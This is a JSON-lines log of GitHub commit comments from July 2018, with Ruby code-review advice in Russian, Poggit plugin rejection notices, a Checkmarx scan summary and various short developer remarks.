{"id":"8037408254","type":"CommitCommentEvent","actor":{"login":"MoonHou"},"repo":{"name":"MoonHou/MoonHou.github.io"},"payload":{"comment":{"id":29886095,"position":null,"line":null,"path":null,"commit_id":"3efa9a25f8aff5b520598ef43e89133d0bbc89a9","created_at":"2018-07-30T12:33:30Z","updated_at":"2018-07-30T12:33:30Z","author_association":"OWNER","body":"哈哈哈1"}},"created_at":"2018-07-30T12:33:30Z"}
{"id":"8037408678","type":"CommitCommentEvent","actor":{"login":"ChuckNoriz"},"repo":{"name":"ChuckNoriz/front-end-gurus"},"payload":{"comment":{"id":29886096,"position":5,"line":39,"path":"index.html","commit_id":"a4f0add878dd9f5167ba78d8e7416b67795a8022","created_at":"2018-07-30T12:33:35Z","updated_at":"2018-07-30T12:33:35Z","author_association":"OWNER","body":"Wa hapend ?"}},"created_at":"2018-07-30T12:33:35Z"}
{"id":"8037408722","type":"CommitCommentEvent","actor":{"login":"smanish01"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886097,"position":null,"line":null,"path":null,"commit_id":"888db5d138ae543b9b64838788bf1af177c4fed1","created_at":"2018-07-30T12:33:35Z","updated_at":"2018-07-30T12:33:35Z","author_association":"OWNER","body":"test comment 3"}},"created_at":"2018-07-30T12:33:35Z"}
{"id":"8037419668","type":"CommitCommentEvent","actor":{"login":"smanish01"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886119,"position":null,"line":null,"path":null,"commit_id":"888db5d138ae543b9b64838788bf1af177c4fed1","created_at":"2018-07-30T12:35:49Z","updated_at":"2018-07-30T12:35:49Z","author_association":"OWNER","body":"test comment 4"}},"created_at":"2018-07-30T12:35:49Z"}
{"id":"8037419811","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886120,"position":17,"line":17,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:35:51Z","updated_at":"2018-07-30T12:35:51Z","author_association":"NONE","body":"аксэссоры мы создаем, когда нам нужно открыть доступ к инстэнс переменным внешнему коду. То есть коду, который будет работать с нашим данным классом. Без лишней надобности - это нарушение принципа инкапсуляции. То есть клиентский код может сделать так\r\n```\r\nt = Train.new(аргументы)\r\nt.speed = \"Pants\"\r\n```\r\nЧем нарушит работу программы и приведет к выбросам исключений. То есть значения инстанс переменных  по возможности должны меняться только внутри методов определенных внутри класса. Например у поезда должен быть метод с помощью которого он будет ускоряться. И именно внутри этого метода и будет устанавливаться скорость. Тем самым мы застраховываем себя от примера, что я привел выше"}},"created_at":"2018-07-30T12:35:51Z"}
{"id":"8037424850","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"KhoaGamingVN/RestartMe-PM"},"payload":{"comment":{"id":29886134,"position":null,"line":null,"path":null,"commit_id":"08dce149fbf66dbc65c3801abb7f6bc46b878c09","created_at":"2018-07-30T12:36:51Z","updated_at":"2018-07-30T12:36:51Z","author_association":"NONE","body":"> Dear @KhoaGamingVN:\n> I regret to inform you that the release you submitted, named \"**RestartMe**\" (v1.4.0), for the project [RestartMe-PM](https://poggit.pmmp.io/ci/KhoaGamingVN/RestartMe-PM/RestartMe-PM) on 2018-07-30T06:37:34.000Z, has been rejected.\n\n3.1.0 are automatically included when you write `3.0.0` in plugin.yml.\n\nWe also do not accept submissions for API 4.0.0, because it does not exist. It is still under development and is subject to change, so it is unreasonable to mark your plugin as supporting 4.0.0.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created.\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-30T12:36:51Z"}
{"id":"8037426363","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886139,"position":23,"line":23,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:37:09Z","updated_at":"2018-07-30T12:37:09Z","author_association":"NONE","body":"Еще у нас тут должна быть скорость, которая 0 по умолчанию"}},"created_at":"2018-07-30T12:37:09Z"}
{"id":"8037429065","type":"CommitCommentEvent","actor":{"login":"wezell"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":29886144,"position":null,"line":null,"path":null,"commit_id":"e78e0abf61075c037f6697e9bfc22075d8c36628","created_at":"2018-07-30T12:37:42Z","updated_at":"2018-07-30T12:37:42Z","author_association":"CONTRIBUTOR","body":"did not mean to push this to master but ok."}},"created_at":"2018-07-30T12:37:42Z"}
{"id":"8037429403","type":"CommitCommentEvent","actor":{"login":"eliskovets"},"repo":{"name":"cristifalcas/puppet-curator"},"payload":{"comment":{"id":29886145,"position":13,"line":20,"path":"metadata.json","commit_id":"276bea57d28966abce8c88c0cc8d5d9cef621bf4","created_at":"2018-07-30T12:37:47Z","updated_at":"2018-07-30T12:37:47Z","author_association":"NONE","body":"Hi guys, sorry for disturbing you.\r\nWe have some problems because of this requirements update. Could you please tell me if it was required for some reason and if it can be changed to `{ \"name\": \"puppetlabs/concat\", \"version_requirement\": \">=2.0.0 <5.0.0\" }`"}},"created_at":"2018-07-30T12:37:47Z"}
{"id":"8037429493","type":"CommitCommentEvent","actor":{"login":"ismyrnow"},"repo":{"name":"ismyrnow/Go"},"payload":{"comment":{"id":29886147,"position":null,"line":null,"path":null,"commit_id":"33d39c24a34c6b699f65c60b346d89ffb8870328","created_at":"2018-07-30T12:37:48Z","updated_at":"2018-07-30T12:37:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [test](https://trello.com/c/yTq7RCv9/197-test)"}},"created_at":"2018-07-30T12:37:48Z"}
{"id":"8037431859","type":"CommitCommentEvent","actor":{"login":"clausjensen"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29886150,"position":6,"line":18,"path":"src/Umbraco.Core/Persistence/Migrations/Upgrades/TargetVersionSevenTwelveZero/IncreaseLanguageIsoCodeColumnLength.cs","commit_id":"f11c71599b7f3589f68efefb9df1cb38750c6a14","created_at":"2018-07-30T12:38:18Z","updated_at":"2018-07-30T12:38:18Z","author_association":"CONTRIBUTOR","body":"Thanks :) Hmm - I couldn't find methods to drop index - do we have one or should one be created?"}},"created_at":"2018-07-30T12:38:18Z"}
{"id":"8037434042","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886153,"position":18,"line":18,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:38:46Z","updated_at":"2018-07-30T12:38:46Z","author_association":"NONE","body":"Правильно, что не добавили current_index. Это внутренние детали реализации, которые внешнему коду знать не нужно. current_index у нас будет использоваться только в методах current_station/next_station/previous_station для нахождения станции"}},"created_at":"2018-07-30T12:38:46Z"}
{"id":"8037440144","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"GuardianRM/Stockfish"},"payload":{"comment":{"id":29886164,"position":null,"line":null,"path":null,"commit_id":"96c54b69f8a60c31b66751b56bf9fd0a64d1771a","created_at":"2018-07-30T12:39:57Z","updated_at":"2018-07-30T12:39:57Z","author_association":"NONE","body":"Please note that CorneredBishop applies only for chess960 (Fischer Random), and currently cannot be tested on fishtest.\r\n\r\n"}},"created_at":"2018-07-30T12:39:57Z"}
{"id":"8037440803","type":"CommitCommentEvent","actor":{"login":"smanish01"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886169,"position":null,"line":null,"path":null,"commit_id":"888db5d138ae543b9b64838788bf1af177c4fed1","created_at":"2018-07-30T12:40:05Z","updated_at":"2018-07-30T12:40:05Z","author_association":"OWNER","body":"test comment 5"}},"created_at":"2018-07-30T12:40:05Z"}
{"id":"8037443318","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29886178,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-30T12:40:33Z","updated_at":"2018-07-30T12:40:33Z","author_association":"OWNER","body":"Checkmarx scan results 30 Jul 2018 15:40 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-30T12:40:33Z"}
{"id":"8037446988","type":"CommitCommentEvent","actor":{"login":"sbstjn"},"repo":{"name":"eddbc/hanu"},"payload":{"comment":{"id":29886187,"position":null,"line":null,"path":null,"commit_id":"d8fd8c6727789151c6a51a046c24c362f155601a","created_at":"2018-07-30T12:41:17Z","updated_at":"2018-07-30T12:41:17Z","author_association":"NONE","body":"😭 "}},"created_at":"2018-07-30T12:41:17Z"}
{"id":"8037447997","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"RealAstro/Money-Pouch"},"payload":{"comment":{"id":29886188,"position":null,"line":null,"path":null,"commit_id":"4c54b8be697c42ff88fd9ecd6d90e48497765123","created_at":"2018-07-30T12:41:29Z","updated_at":"2018-07-30T12:41:29Z","author_association":"NONE","body":"> Dear @RealAstro:\n> I regret to inform you that the release you submitted, named \"**MoneyPouch**\" (v1.0.0), for the project [Money-Pouch](https://poggit.pmmp.io/ci/RealAstro/Money-Pouch/Money-Pouch) on 2018-07-29T12:24:08.000Z, has been rejected.\n\nWe do not accept submissions for API 4.0.0, because it does not exist. It is still under development and is subject to change, so it is unreasonable to mark your plugin as supporting 4.0.0.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:41:29Z"}
{"id":"8037449706","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29886191,"position":null,"line":null,"path":null,"commit_id":"657f8111e4cebe613876b6d3ba78bb0d7d133ed9","created_at":"2018-07-30T12:41:50Z","updated_at":"2018-07-30T12:41:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-445](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-445).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-445-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T12:41:50Z"}
{"id":"8037449883","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"Potatoshare88/PSArea"},"payload":{"comment":{"id":29886193,"position":null,"line":null,"path":null,"commit_id":"b913763ebd28ab45c304b76730583c8131ec6c0d","created_at":"2018-07-30T12:41:53Z","updated_at":"2018-07-30T12:41:53Z","author_association":"NONE","body":"> Dear @Potatoshare88:\n> I regret to inform you that the release you submitted, named \"**PSArea**\" (v1.2.0), for the project [PSArea](https://poggit.pmmp.io/ci/Potatoshare88/PSArea/PSArea) on 2018-07-29T07:15:33.000Z, has been rejected.\n\nWe do not accept submissions for API 4.0.0, because it does not exist. It is still under development and is subject to change, so it is unreasonable to mark your plugin as supporting 4.0.0.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:41:53Z"}
{"id":"8037452394","type":"CommitCommentEvent","actor":{"login":"AshishYadavTCS"},"repo":{"name":"AshishYadavTCS/helloworld"},"payload":{"comment":{"id":29886199,"position":null,"line":null,"path":null,"commit_id":"071180e48436fe59663a62ae0500d548bfd1bc9f","created_at":"2018-07-30T12:42:23Z","updated_at":"2018-07-30T12:42:23Z","author_association":"OWNER","body":"e"}},"created_at":"2018-07-30T12:42:23Z"}
{"id":"8037456088","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886204,"position":18,"line":18,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:43:06Z","updated_at":"2018-07-30T12:43:06Z","author_association":"NONE","body":"Не помню, если это упоминалось в скринкасте, но вот, что делают ридеры. \r\n```\r\nattr_reader :forward_station\r\n# это тоже самое, что и \r\ndef forward_station\r\n  @forward_station\r\nend\r\n```\r\nТо есть ридер, это синтактический сахар, для метода, который будет читать инстанс переменную. К чему я все это? Переменных `@forward/backward/current_station` у нас нет и не должно быть. Потому-что это названия методов, который достают нужную станцию из маршрута. Им не место в ридере/аксэсоре."}},"created_at":"2018-07-30T12:43:06Z"}
{"id":"8037457131","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"CapricornOfLynx/Sizer"},"payload":{"comment":{"id":29886206,"position":null,"line":null,"path":null,"commit_id":"f62b1a0eb94dd7dea8cfaaddc6466ff19c872fca","created_at":"2018-07-30T12:43:18Z","updated_at":"2018-07-30T12:43:18Z","author_association":"NONE","body":"> Dear @CapricornOfLynx:\n> I regret to inform you that the release you submitted, named \"**Sizer**\" (v4.0.0), for the project [Sizer](https://poggit.pmmp.io/ci/CapricornOfLynx/Sizer/Sizer) on 2018-07-28T08:52:50.000Z, has been rejected.\n\n3.0.5, 3.0.6, 3.1.0, etc. are automatically included when you write `3.0.4` in plugin.yml. This will raise warnings in future versions of PocketMine. Please remove them.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:43:18Z"}
{"id":"8037460825","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886213,"position":10,"line":8,"path":".gitignore","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:44:01Z","updated_at":"2018-07-30T12:44:01Z","author_association":"CONTRIBUTOR","body":"The build secret isn't needed"}},"created_at":"2018-07-30T12:44:01Z"}
{"id":"8037462198","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886218,"position":7,"line":27,"path":"Jenkinsfile","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:44:18Z","updated_at":"2018-07-30T12:44:18Z","author_association":"CONTRIBUTOR","body":"This one isn't needed."}},"created_at":"2018-07-30T12:44:18Z"}
{"id":"8037462740","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"SpecterTeam/EasyPets"},"payload":{"comment":{"id":29886225,"position":null,"line":null,"path":null,"commit_id":"d4aae0f94686cc6c5f649a9f5f0f402c512441cf","created_at":"2018-07-30T12:44:24Z","updated_at":"2018-07-30T12:44:24Z","author_association":"NONE","body":"> Dear @SpecterTeam:\n> I regret to inform you that the release you submitted, named \"**EasyPets**\" (v1.0), for the project [EasyPets](https://poggit.pmmp.io/ci/SpecterTeam/EasyPets/EasyPets) on 2018-07-23T01:09:39.000Z, has been rejected.\n\nWe do not accept submissions for API 4.0.0, because it does not exist. It is still under development and is subject to change, so it is unreasonable to mark your plugin as supporting 4.0.0.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:44:24Z"}
{"id":"8037466030","type":"CommitCommentEvent","actor":{"login":"gustal-el"},"repo":{"name":"gustal-el/testingProjetcts"},"payload":{"comment":{"id":29886235,"position":null,"line":null,"path":null,"commit_id":"95b90344b08c4f12428fd6d9ddd055529491a83c","created_at":"2018-07-30T12:45:04Z","updated_at":"2018-07-30T12:45:04Z","author_association":"OWNER","body":"First commit"}},"created_at":"2018-07-30T12:45:04Z"}
{"id":"8037468031","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886247,"position":4,"line":293,"path":"Yona/Yona.xcodeproj/project.pbxproj","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:45:27Z","updated_at":"2018-07-30T12:45:27Z","author_association":"CONTRIBUTOR","body":"This one isn't needed."}},"created_at":"2018-07-30T12:45:27Z"}
{"id":"8037468890","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886249,"position":12,"line":648,"path":"Yona/Yona.xcodeproj/project.pbxproj","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:45:37Z","updated_at":"2018-07-30T12:45:37Z","author_association":"CONTRIBUTOR","body":"This one isn't needed"}},"created_at":"2018-07-30T12:45:37Z"}
{"id":"8037469314","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"WeekThor/GeoIP"},"payload":{"comment":{"id":29886250,"position":null,"line":null,"path":null,"commit_id":"6f2ddb5f861478565705b95364a953b72442e083","created_at":"2018-07-30T12:45:41Z","updated_at":"2018-07-30T12:45:41Z","author_association":"NONE","body":"> Dear @WeekThor:\n> I regret to inform you that the release you submitted, named \"**GeoIP**\" (v1.0), for the project [GeoIP](https://poggit.pmmp.io/ci/WeekThor/GeoIP/GeoIP) on 2018-07-21T16:18:35.000Z, has been rejected.\n\nThis plugin only supports API 3.0.0-ALPHA9. Since most users are not using 3.0.0-ALPHA9, to save time, we are not going to review this. If you really want to submit it, please update the plugin.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:45:41Z"}
{"id":"8037469511","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886252,"position":20,"line":1340,"path":"Yona/Yona.xcodeproj/project.pbxproj","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:45:44Z","updated_at":"2018-07-30T12:45:44Z","author_association":"CONTRIBUTOR","body":"This one isn't needed"}},"created_at":"2018-07-30T12:45:44Z"}
{"id":"8037470414","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886255,"position":28,"line":1431,"path":"Yona/Yona.xcodeproj/project.pbxproj","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:45:54Z","updated_at":"2018-07-30T12:45:54Z","author_association":"CONTRIBUTOR","body":"This one isn't needed"}},"created_at":"2018-07-30T12:45:54Z"}
{"id":"8037470845","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886258,"position":36,"line":1580,"path":"Yona/Yona.xcodeproj/project.pbxproj","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:46:00Z","updated_at":"2018-07-30T12:46:00Z","author_association":"CONTRIBUTOR","body":"This one isn't needed"}},"created_at":"2018-07-30T12:46:00Z"}
{"id":"8037471269","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886260,"position":44,"line":1687,"path":"Yona/Yona.xcodeproj/project.pbxproj","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:46:06Z","updated_at":"2018-07-30T12:46:06Z","author_association":"CONTRIBUTOR","body":"This one isn't needed"}},"created_at":"2018-07-30T12:46:06Z"}
{"id":"8037471665","type":"CommitCommentEvent","actor":{"login":"wlpSensor7"},"repo":{"name":"WeboChat/BBS"},"payload":{"comment":{"id":29886262,"position":null,"line":null,"path":null,"commit_id":"07b2bb08cfed171679b0e45ddf78d25eb1e78fb3","created_at":"2018-07-30T12:46:11Z","updated_at":"2018-07-30T12:46:11Z","author_association":"CONTRIBUTOR","body":"ok"}},"created_at":"2018-07-30T12:46:11Z"}
{"id":"8037473008","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"FutureDeveloperZ/WolfGangShopUI"},"payload":{"comment":{"id":29886266,"position":null,"line":null,"path":null,"commit_id":"5f0e47489090fb8a0b863d6e730b99b3d21bd354","created_at":"2018-07-30T12:46:26Z","updated_at":"2018-07-30T12:46:26Z","author_association":"NONE","body":"> Dear @FutureDeveloperZ:\n> I regret to inform you that the release you submitted, named \"**WolfGangShopUI**\" (v0.1-Beta.1), for the project [WolfGangShopUI](https://poggit.pmmp.io/ci/FutureDeveloperZ/WolfGangShopUI/WolfGangShopUI) on 2018-07-21T12:28:35.000Z, has been rejected.\n\n3.0.4 are automatically included when you write `3.0.0` in plugin.yml. This will raise warnings in future versions of PocketMine. Please remove them.\n\nWe also do not accept submissions for API 4.0.0, because it does not exist. It is still under development and is subject to change, so it is unreasonable to mark your plugin as supporting 4.0.0.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:46:26Z"}
{"id":"8037473346","type":"CommitCommentEvent","actor":{"login":"Bert-R"},"repo":{"name":"yonadev/yona-app-ios"},"payload":{"comment":{"id":29886267,"position":1,"line":1,"path":"Yona/fabric_script.sh","commit_id":"f827257c57fccd0482dfe7686cde60a9b28ff1c5","created_at":"2018-07-30T12:46:30Z","updated_at":"2018-07-30T12:46:30Z","author_association":"CONTRIBUTOR","body":"This file isn't needed"}},"created_at":"2018-07-30T12:46:30Z"}
{"id":"8037476383","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"xkhhv/StackerPE"},"payload":{"comment":{"id":29886270,"position":null,"line":null,"path":null,"commit_id":"627e3cf47e7197b17805f7b39710e71df106e003","created_at":"2018-07-30T12:47:07Z","updated_at":"2018-07-30T12:47:07Z","author_association":"NONE","body":"> Dear @xkhhv:\n> I regret to inform you that the release you submitted, named \"**StackerPE**\" (v1.0.0), for the project [StackerPE](https://poggit.pmmp.io/ci/xkhhv/StackerPE/StackerPE) on 2018-07-16T22:27:02.000Z, has been rejected.\n\n3.0.1, 3.0.2, 3.1.0, etc. are automatically included when you write `3.0.0` in plugin.yml. This will raise warnings in future versions of PocketMine. Please remove them.\n\nWe also do not accept submissions for API 4.0.0, because it does not exist. It is still under development and is subject to change, so it is unreasonable to mark your plugin as supporting 4.0.0.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:47:07Z"}
{"id":"8037477620","type":"CommitCommentEvent","actor":{"login":"MMateusiakS"},"repo":{"name":"PKacprowiczS/SmartThingsPublic"},"payload":{"comment":{"id":29886271,"position":146,"line":108,"path":"devicetypes/smartthings/zwave-alarm-sound-detector.src/zwave-alarm-sound-detector.groovy","commit_id":"ebe745bca292a9e63cf688609a026b112b8b92fc","created_at":"2018-07-30T12:47:21Z","updated_at":"2018-07-30T12:47:21Z","author_association":"NONE","body":"Do we need to send event in this method? Can we return empty map?"}},"created_at":"2018-07-30T12:47:21Z"}
{"id":"8037478319","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"CubePM/MysteryBox"},"payload":{"comment":{"id":29886272,"position":null,"line":null,"path":null,"commit_id":"109bb0ddf6a0d8ffa07578a8260d6282b570c087","created_at":"2018-07-30T12:47:29Z","updated_at":"2018-07-30T12:47:29Z","author_association":"NONE","body":"> Dear @CubePM:\n> I regret to inform you that the release you submitted, named \"**MysteryBox**\" (v1.0.0), for the project [MysteryBox](https://poggit.pmmp.io/ci/CubePM/MysteryBox/MysteryBox) on 2018-07-11T02:44:16.000Z, has been rejected.\n\nWe do not accept submissions for API 4.0.0, because it does not exist. It is still under development and is subject to change, so it is unreasonable to mark your plugin as supporting 4.0.0.\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-30T12:47:29Z"}
{"id":"8037483387","type":"CommitCommentEvent","actor":{"login":"anmolnar"},"repo":{"name":"apache/zookeeper"},"payload":{"comment":{"id":29886282,"position":null,"line":null,"path":null,"commit_id":"a2623a625a4778720f7d5482d0a66e9b37ae556f","created_at":"2018-07-30T12:48:29Z","updated_at":"2018-07-30T12:48:29Z","author_association":"CONTRIBUTOR","body":"Insecure. JMX and Jetty are the future for 3.5+\r\nJMX is also questionable. Not sure if we could drop that too."}},"created_at":"2018-07-30T12:48:29Z"}
{"id":"8037483985","type":"CommitCommentEvent","actor":{"login":"xkhhv"},"repo":{"name":"xkhhv/StackerPE"},"payload":{"comment":{"id":29886283,"position":null,"line":null,"path":null,"commit_id":"627e3cf47e7197b17805f7b39710e71df106e003","created_at":"2018-07-30T12:48:36Z","updated_at":"2018-07-30T12:48:36Z","author_association":"OWNER","body":"@SOF3 Ok thank you"}},"created_at":"2018-07-30T12:48:36Z"}
{"id":"8037487811","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29886297,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-30T12:49:21Z","updated_at":"2018-07-30T12:49:21Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-30T12:49:21Z"}
{"id":"8037488271","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886302,"position":27,"line":27,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:49:27Z","updated_at":"2018-07-30T12:49:27Z","author_association":"NONE","body":"Нужно просто set_route без `=`. Равно обычно используется для методов сеттеров, которые устанавливают значения одноименных инстэнс переменных. Кстати, если привести аналогию с attr_reader, то attr_writer делает\r\n```\r\ndef route=(route)\r\n  @route = route\r\nend\r\n```\r\nИ по конвенциям синтаксис с = используется именно для определения сеттера. Но тут у нас не метод сеттер, а метод, который полностью справляется с логикой установкой маршрута"}},"created_at":"2018-07-30T12:49:27Z"}
{"id":"8037491452","type":"CommitCommentEvent","actor":{"login":"baffioso"},"repo":{"name":"regiongis/python_helpers"},"payload":{"comment":{"id":29886311,"position":null,"line":null,"path":null,"commit_id":"7e41d135180e1eb9047b67ec21b9738d12664653","created_at":"2018-07-30T12:50:03Z","updated_at":"2018-07-30T12:50:03Z","author_association":"NONE","body":"Ok. Får du geometrier ud som wkt når du henter dem ind i pandas? Jeg får blot postgis's mærkelig format. Har kigget lidt på geopandas men når ikke postgis til sokkeholderne i funktionalitet. Kan dog være det kommer. "}},"created_at":"2018-07-30T12:50:03Z"}
{"id":"8037498779","type":"CommitCommentEvent","actor":{"login":"azarz"},"repo":{"name":"airware/buzzard"},"payload":{"comment":{"id":29886324,"position":null,"line":null,"path":null,"commit_id":"7042846b541aaef0d7261b4ff2966d53350772fb","created_at":"2018-07-30T12:51:27Z","updated_at":"2018-07-30T12:51:27Z","author_association":"CONTRIBUTOR","body":"`acreate_vector()` works too with this commit"}},"created_at":"2018-07-30T12:51:27Z"}
{"id":"8037502203","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29886334,"position":29,"line":29,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:52:05Z","updated_at":"2018-07-30T12:52:05Z","author_association":"NONE","body":"Вот тут лучше записывать только индекс станции. И кстати, нужно сказать станции, что на нее приехал поезд."}},"created_at":"2018-07-30T12:52:05Z"}
{"id":"8037504190","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/bravado-core-feedstock"},"payload":{"comment":{"id":29886343,"position":null,"line":null,"path":null,"commit_id":"b295c7f335bb6a9936330288a615719bc8efc978","created_at":"2018-07-30T12:52:25Z","updated_at":"2018-07-30T12:52:25Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @chapmanb was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-30T12:52:25Z"}
